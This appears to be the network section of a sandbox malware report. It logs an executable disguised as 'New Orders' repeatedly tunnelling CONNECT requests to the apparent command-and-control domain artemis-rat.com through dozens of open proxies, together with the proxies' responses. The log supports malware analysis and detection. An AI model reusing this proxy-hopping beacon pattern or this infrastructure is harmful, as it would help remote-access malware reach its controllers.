                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.268400908 CET243INHTTP/1.0 307 Temporary Redirect
                                                                                        Content-Length: 0
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close
                                                                                        Location: http://www.avis.com.hn


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1897192.168.2.95321192.205.110.47196007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.031199932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.132750034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.204166889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.241971970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.241941929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1898192.168.2.953327208.87.131.240413687672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.036350965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1899192.168.2.953257198.49.68.80807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.037105083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.163883924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164036036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273576975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.273139000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.273108959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.273174047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.273309946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1900192.168.2.95332067.43.228.252286957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.039598942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1901192.168.2.955077185.225.232.191807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.039603949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.360702038 CET805INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Server: Apache/2.4.57 (Debian)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1902192.168.2.95334592.204.135.37338997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.039829016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.163904905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164035082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273602962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.273119926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1903192.168.2.9550835.182.39.2531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.039829969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.737854004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723349094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.742213011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.632992983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633225918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.648211002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1904192.168.2.955095184.185.2.1241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.047171116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1905192.168.2.955093125.122.26.24210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.047529936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1906192.168.2.95507120.219.177.3831297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.048319101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.442404032 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1907192.168.2.953127167.86.69.142363947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.069684029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.163952112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164083958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273621082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.273123980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1908192.168.2.9551028.218.100.12080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.074989080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1909192.168.2.95510347.243.114.19281807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.074990034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1910192.168.2.953295149.210.235.10781187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.078100920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.132740974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.204200029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.494559050 CET132INHTTP/1.1 503 Too many open connections
                                                                                        Content-Type: text/plain
                                                                                        Connection: close
                                                                                        Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                        Data Ascii: Maximum number of open connections reached.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1911192.168.2.955098111.90.150.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.078102112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1912192.168.2.955101138.36.150.2610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.082777977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976320028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1913192.168.2.955107196.20.125.12980837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.087125063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1914192.168.2.955105103.216.49.23380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.087304115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1915192.168.2.95505851.15.252.246163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.092001915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.164047003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164087057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.273616076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.276236057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.672210932 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
